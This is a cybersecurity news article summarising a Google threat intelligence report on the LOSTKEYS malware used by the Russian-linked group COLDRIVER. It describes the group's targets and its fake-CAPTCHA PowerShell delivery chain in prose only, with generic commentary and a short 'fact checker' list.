Listen to this Post
In recent cybersecurity developments, Google’s Threat Intelligence Group (GTIG) has uncovered a new malware strain named LOSTKEYS. This malware is being used by the Russian-linked Advanced Persistent Threat (APT) group known as COLDRIVER. With a history of targeting high-profile individuals and organizations, COLDRIVER’s latest campaign is marked by sophisticated attack methods and a focused aim at stealing critical data, including files and system information. This article delves into the key findings of the Google GTIG report, examining how the malware operates, its victims, and the evolving tactics of COLDRIVER.
Analysis of
Google’s GTIG has discovered that COLDRIVER, also known by several other aliases like Seaborgium, Callisto, and Star Blizzard, has been employing the LOSTKEYS malware to further its cyberespionage operations. This group has been active since at least 2015, primarily targeting NATO countries, as well as regions like the Baltics, Nordics, Eastern Europe, and notably Ukraine. Their past campaigns have included phishing, credential theft, and other forms of data exfiltration aimed at government officials, military personnel, journalists, and think tanks.
In early 2025, COLDRIVER launched a targeted campaign using the LOSTKEYS malware to infiltrate victims’ systems. This malware is delivered through a multi-stage attack that begins with a deceptive fake CAPTCHA. The attacker uses this to trick the victim into executing a malicious PowerShell script. The script, once run, follows a specific chain of execution that involves fetching payloads from remote servers. These payloads, which include VBS (Visual Basic Script) files, are used to steal sensitive data, such as files with specific extensions, and send system information to the attacker.
The malware is designed with a high level of specificity, using a variety of techniques to evade detection and ensure it targets only certain individuals. For example, the malware checks the device’s display resolution and halts its execution if certain criteria are not met. Additionally, the payloads used in these attacks are uniquely crafted for each victim, ensuring a tailored and efficient attack method.
The stolen data includes email credentials, contact lists, and files, which are essential for COLDRIVER’s intelligence-gathering operations. Although the primary goal of the group is espionage for Russian interests, the stolen data is sometimes used in hack-and-leak operations to publicly embarrass or discredit the targets.
What Undercode Says:
The ongoing use of sophisticated malware like LOSTKEYS is a clear indicator of the escalating cyberwarfare tactics employed by Russian-linked groups. COLDRIVERās method of delivering malware via deceptive PowerShell scripts is particularly troubling due to its stealthy nature. The multi-stage execution chain makes it difficult for traditional security tools to detect and block the attack before significant damage is done.
This selective attack methodology suggests a high level of resource allocation, with malware being deployed only against targets deemed valuable to Russian interests. Unlike other more indiscriminate cyberattacks, COLDRIVER’s actions point to a deliberate strategy of collecting strategic intelligence. The targeted nature of the attack implies that the group has a deep understanding of its victims’ profiles, ranging from government officials to journalists, and is using this data to further their geopolitical objectives.
The involvement of PowerShell as the attack vector is also notable. PowerShell-based attacks have become a common feature of advanced cyber espionage campaigns, as it is a legitimate tool that can be abused to bypass security defenses. By masquerading as a typical system process, PowerShell scripts can operate under the radar, making it challenging for security experts to identify malicious activity early.
Additionally, the fact that two separate malware samples have been discoveredāone from January 2025 and one from December 2023āraises the question of whether COLDRIVER has been experimenting with different methods of malware deployment. The December 2023 samples pretending to be Maltego software could signify the group’s adaptability and willingness to repurpose tools from other operations or developers, which suggests they are always refining their tactics to stay ahead of cybersecurity defenses.
From an intelligence perspective, this operation is a critical reminder of how cyberespionage is evolving. State-backed APT groups are increasingly using advanced techniques and malware tailored to exploit specific vulnerabilities in their targets. The stolen credentials, emails, and contacts are not just incidentalāthey form a core part of the broader strategy of influencing political landscapes and gathering sensitive information to fuel further operations.
Furthermore, the close ties between malware operations like LOSTKEYS and the broader geopolitical climate cannot be ignored. This attack is not only about stealing data; itās about leveraging that data for broader strategic gains. For example, the inclusion of Ukrainian-linked individuals as targets aligns with ongoing tensions and the geopolitical situation in Eastern Europe, particularly in relation to the Russian-Ukrainian conflict.
Fact Checker Results:
- COLDRIVER has been active since at least 2015, with a long history of cyberespionage targeting government entities and high-profile individuals.
- LOSTKEYS malware has been used in highly targeted campaigns, with a clear focus on stealing files and system information from selected individuals.
- The technique of using deceptive PowerShell scripts and staged payloads is consistent with other known cyberespionage campaigns attributed to Russian state-backed groups.
Prediction:
Looking ahead, the tactics employed by COLDRIVER are likely to evolve further. Given the increasing sophistication of the groupās malware, future attacks could feature even more personalized and evasive methods. As international tensions rise, especially between Russia and Western powers, we can expect cyberattacks to play an increasingly critical role in geopolitical strategy. The use of malware like LOSTKEYS could become more widespread, with other APT groups adopting similar tactics. Security teams and organizations must remain vigilant, continually updating their defenses and monitoring for these highly targeted, evolving threats.
References:
Reported By: securityaffairs.com
Extra Source Hub:
https://www.medium.com
Wikipedia
Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
